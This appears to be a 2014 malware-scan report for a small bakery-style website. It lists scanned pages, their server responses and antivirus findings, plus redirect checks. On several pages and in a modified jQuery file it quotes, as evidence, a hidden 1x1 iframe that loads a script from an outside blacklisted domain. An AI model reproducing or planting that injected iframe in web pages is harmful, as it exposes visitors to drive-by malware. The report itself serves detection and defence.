Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=breadandtulips.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://breadandtulips.com/ | 200 OK Content-Length: 1726 Content-Type: text/html | malicious |
Page code contains blacklisted domain: bh.hithomeloans.com ...[750 bytes skipped]... r/> <img class="fourimages_image" src="../../Content/themes/cookie/images/home2.gif" /> <img class="fourimages_image" src="../../Content/themes/cookie/images/home3.gif" /> <img class="fourimages_image" src="../../Content/themes/cookie/images/home4.gif" /> <img class="fourimages_image" src="../../Content/themes/cookie/images/home5.gif" /> </div> <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"></iframe> </div> <!-- End Content --> </div> <!-- End Wrapper --> <div class="footer"> <a href="About"><img src="../../Content/themes/cookie/images/about.jpg" /></a> <img src="../../Content/themes/cookie/images/menu.jpg" /> <img src=" ...[475 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://bh.hithomeloans.com/channel/funds_impact.php This URL is marked by Google as suspicious <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"> | ||
http://breadandtulips.com/Scripts/jquery-1.4.4.min.js | 200 OK Content-Length: 79129 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[82581 bytes skipped]... CSS1Compat"&&f.document.documentElement["client"+b]||f.document.body["client"+b];else if(f.nodeType===9)return Math.max(f.documentElement["client"+ b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"></iframe> Antivirus reports:
Malicious iFrame found. size: 1x1 src: http://bh.hithomeloans.com/channel/funds_impact.php This URL is marked by Google as suspicious <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"> | ||
http://breadandtulips.com/About | 200 OK Content-Length: 2674 Content-Type: text/html | malicious |
Page code contains blacklisted domain: bh.hithomeloans.com ...[2034 bytes skipped]... /> <p><a itemprop="url" href="http://www.breadandtulips.com/">BreadAndTulips.com</a></p> <span itemprop="geo" itemscope itemtype="http://data-vocabulary.org/Geo"> <meta itemprop="latitude" content="35.942024" /> <meta itemprop="longitude" content="-78.570526" /> </span> </article> </div> <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"></iframe> </div> <!-- End Content --> </div> <!-- End Wrapper --> <div class="footer"> <a href="About"><img src="../../Content/themes/cookie/images/about.jpg" /></a> <img src="../../Content/themes/cookie/images/menu.jpg" /> <img src=". ...[474 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://bh.hithomeloans.com/channel/funds_impact.php This URL is marked by Google as suspicious <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"> | ||
http://breadandtulips.com/blog | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://breadandtulips.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://breadandtulips.com/. | 200 OK Content-Length: 1726 Content-Type: text/html | malicious |
Page code contains blacklisted domain: bh.hithomeloans.com ...[750 bytes skipped]... r/> <img class="fourimages_image" src="../../Content/themes/cookie/images/home2.gif" /> <img class="fourimages_image" src="../../Content/themes/cookie/images/home3.gif" /> <img class="fourimages_image" src="../../Content/themes/cookie/images/home4.gif" /> <img class="fourimages_image" src="../../Content/themes/cookie/images/home5.gif" /> </div> <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"></iframe> </div> <!-- End Content --> </div> <!-- End Wrapper --> <div class="footer"> <a href="About"><img src="../../Content/themes/cookie/images/about.jpg" /></a> <img src="../../Content/themes/cookie/images/menu.jpg" /> <img src=" ...[475 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://bh.hithomeloans.com/channel/funds_impact.php This URL is marked by Google as suspicious <iframe src="http://bh.hithomeloans.com/channel/funds_impact.php" width="1" height="1"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: breadandtulips.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 08 Jun 2014 14:07:17 GMT
Server: Microsoft-IIS/8.5
Content-Length: 1726
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
...1726 bytes of data.
GET / HTTP/1.1
Host: breadandtulips.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 08 Jun 2014 14:07:17 GMT
Server: Microsoft-IIS/8.5
Content-Length: 1726
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
...1726 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: breadandtulips.com
Referer: http://www.google.com/search?q=breadandtulips.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: breadandtulips.com
Referer: http://www.google.com/search?q=breadandtulips.com
Result:
The result is similar to the first query. There are no suspicious redirects found.